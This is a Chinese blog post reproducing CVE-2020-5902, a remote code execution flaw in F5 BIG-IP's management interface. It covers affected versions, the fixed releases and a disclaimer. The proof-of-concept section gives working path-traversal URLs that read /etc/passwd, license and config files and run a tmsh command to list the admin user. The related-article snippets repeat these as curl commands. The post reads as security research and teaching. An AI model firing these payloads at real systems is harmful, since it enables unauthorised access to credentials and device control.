CVE-2020-5902(BIG-IP RCE)复现

最新推荐文章于 2021-11-03 09:42:45 发布
最新推荐文章于 2021-11-03 09:42:45 发布
阅读量1k 收藏
点赞数
文章标签: linux 安全 java ssh python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/117811807
版权

v2-219ca5529f4409ebf7e595d0229bee71_b.jpg

​CVE-2020-5902(BIG-IP RCE)

一、漏洞描述

F5 BIG-IP是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

在F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞。

未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制F5 BIG-IP的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

二、影响版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

三、漏洞验证

POC:

https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hostshttps:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.licensehttps:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.confhttps:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

截图:


v2-db5113c27cd317c4028cdcf41a9c4a3b_b.jpg


简单编写py脚本


v2-869c1c6c86781891dc7f582371912111_b.jpg


验证:


v2-c60f04715586b7c36fc31e865d1f7cad_b.jpg


四、漏洞修复

升级到以下版本:

BIG-IP 15.x: 15.1.0.4

BIG-IP 14.x: 14.1.2.6

BIG-IP 13.x: 13.1.3.4

BIG-IP 12.x: 12.1.5.2

BIG-IP 11.x: 11.6.5.2

参考:

blog.csdn.net/weixin_45

github.com/nsflabs/CVE-

github.com/jas502n/CVE-

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!


v2-c80c87cb78cf66222785b2baa2a6c6f9_b.jpg


个人知乎:zhihu.com/people/fu-wei

个人简书:jianshu.com/u/bf0e38a8d

原文连接:

mp.weixin.qq.com/s/twTC

thelostworld-公众号
关注
F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902)
谢公子的博客
07-07 2013
F5 BIG-IP F5 BIG-IP Edge Gateway是一个接入解决方案,为远程用户提供了SSL VPN远程接入、安全性、应用加速和高可用性服务。 CVE-2020-5902 漏洞描述 2020年7月3日,未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意Java代码执行。进而控制F5 BIG-IP的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等,该漏洞影响控制面板受影响,不影响数据面板。 漏洞危害等级 严重 影响版本 BIG-IP
F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)复现
m0_48520508的博客
11-18 1271
0x00简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞,导致可以未授权访问TMUI模块所有功能(包括未公开功能),漏洞影响范围包括执行任意系统命令、任意文件读取、任意文件写入、开启/禁用服务等。 0x02漏洞概述 攻击者可利用该漏洞执行任意系统命令、创建或删除文件、禁用服务、执行任意的Java代码,可获取sh
CVE-2020-5902 BIG-IP RCE漏洞复现
weixin_44508748的博客
11-21 204
影响范围 版本号主要如下 11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x 文件读取poc curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileN
CVE-2020-5902 BIG-IP RCE漏洞复现&exp
Adminxe的博客
07-12 1018
0x01 漏洞简述 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 0x02 漏洞详情 未授权的远程...
CVE-2020-5902BIG-IP RCE复现
thelostworld
07-06 357
CVE-2020-5902BIG-IP RCE) 一、漏洞描述 F5 BIG-IP是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制F5 BIG-IP的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 二、影响.
F5 BIG-IP hsqldb(CVE-2020-5902)漏洞踩坑分析
晓得哥的博客
07-16 646
作者:Longofo@知道创宇404实验室时间:2020年7月10日English Version:https://paper.seebug.org/1272/ 原文链接:https://paper.seebug.org/1271/ F5 BIG-IP最近发生了一次比较严重的RCE漏洞,其中主要公开出来的入口就是tmsh与hsqldb方式,tmsh的利用与分析分析比较多了,如果复现过tmsh的利用,就应该知道这个地方利用有些鸡肋,后面不对tmsh进行分析,主要看下hsqldb的利用。hsqldb的利用.
BIG-IP(BIG-IQ)未授权RCE(CVE-2021-22986)1
08-08
这是一个针对F5 BIG-IPBIG-IQ系统的严重漏洞,被称为未授权远程代码执行(RCE)漏洞。攻击者无需任何身份验证,通过iControl REST接口发送恶意构造的请求,就能在目标系统上执行任意命令,从而获得对设备的完全...
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞
weixin_51387754的博客
11-03 450
漏洞简介 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 近日,F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行,代码执行的风险声明,F5安全公告更新了BIG-IPBIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本,避免遭到攻击。 影响版本: F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1
F5 BIG-IP 远程代码执行漏洞(CVE-2020-5902) 附 shodan语法
scrooge51的博客
07-07 1153
漏洞原理 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。 影响版本 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0 ~ 13.1.3 BIG-IP 12.x: 12.1.0 ~ 12.1.5 BIG-IP 11
CVE-2021-22986-Poc:这是BIGIP iControl取消身份验证RCE的Poc
03-25
CVE-2021-22986-Poc 这是BIGIP iControl取消身份验证RCE的Poc POC:〜 curl -ksu管理员:[已删除] -d'{“ filePath”:“ id ”}'| jq。 curl -ksu: ://192.168.123.134/mgmt/shared/authn/login -d'{“ bigipAuthCookie”:“”,“ loginReference”:{“ link”:“ '| jq。 curl -su管理员:-H“内容类型:application / json” -d'{“ command”:“ run”,“ utilCmdArgs”:“-c id“}'| jq。 参考: :
F5 BIG-IP TMUI 远程代码执行漏洞(CVE-2020-5902
box
07-24 798
一、漏洞详情 近日,绿盟科技监测到F5官方对流量管理用户界面(TMUI)远程代码执行漏洞(CVE-2020-5902)的安全公告进行了更新。受影响的15.x版本变更为15.0.0-15.1.0,更新了可被绕过的临时缓解措施及验证方法;未经身份验证的攻击者通过BIG-IP管理端口或自身IP访问TMUI,可构造恶意请求获取目标服务器权限,CVSS评分为10分。目前msf已经集成了该漏洞的利用,建议还未修复的用户尽快采取措施进行防护。 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全
CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告
爱国小白帽
07-04 3650
CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞简述 2020年07月03日, 360CERT监测发现 F5 发布了 F5 BIG-IP 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-5902,漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令
CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞分析
爱国小白帽
07-15 1322
360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 漏洞简述 2020年07月08日, 360CERT监测发现 F5 官方更新了 F5 BIG-IP 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-5902,漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等,使用官方的httpd配置
CVE-2020-5902 F5 BIG-IP 远程代码执行RCE
weixin_41082546的博客
07-06 228
cve-2020-5902 : RCE: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' Read File: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
CVE-2020-5902:F5 BIG-IP 远程代码执行漏洞复现
黑白的博客
11-01 658
声明 好好学习,天天向上 漏洞描述 BIG-IP F5,很熟悉,负载均衡,代理,请求转发,经常会用到 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 影响范围 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0
【利用公开】CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告
爱国小白帽
07-06 1698
【利用公开】CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞简述 2020年07月03日, 360CERT监测发现 F5 发布了 F5 BIG-IP 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-5902,漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行
CVE-2020-5902:F5 BIG-IP TMUI远程代码执行漏洞复现
Jietewang的博客
11-23 1315
BIG-IP是F5公司制造的一款多功能网络设备,设备经配置后可作为流量控制系统、负载平衡器、防火墙、访问网关、速率限制器或SSL中间件。基础信息FOFA指纹:title=”BIG-IP®-Redirect”下载地址:https://downloads.f5.com/esd/eula.sv?
从目录遍历到RCE:对CVE-20205902的深入了解
知柯信安
01-09 488
CVE-2020-5902发布以来,互联网一直在嗡嗡作响,这是有充分理由的。由Mikhail Klyuchnikov发现的此漏洞是史诗级事件之一。不应通过公共IP空间访问流量管理用户界面(TMUI),但是在Shodan上进行的快速搜索将发现超过8,400个易受攻击的系统,并且此搜索中可能没有更多原因。 截至2020年7月4日,该漏洞 已被广泛发现并在野外被利用,使攻击者能够在易受攻击的系统上读取文件并执行代码。我本来打算为此发布概念证明,以便有时间让公司修补系统,但是由于概念证明今天似乎遍布Twitter
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值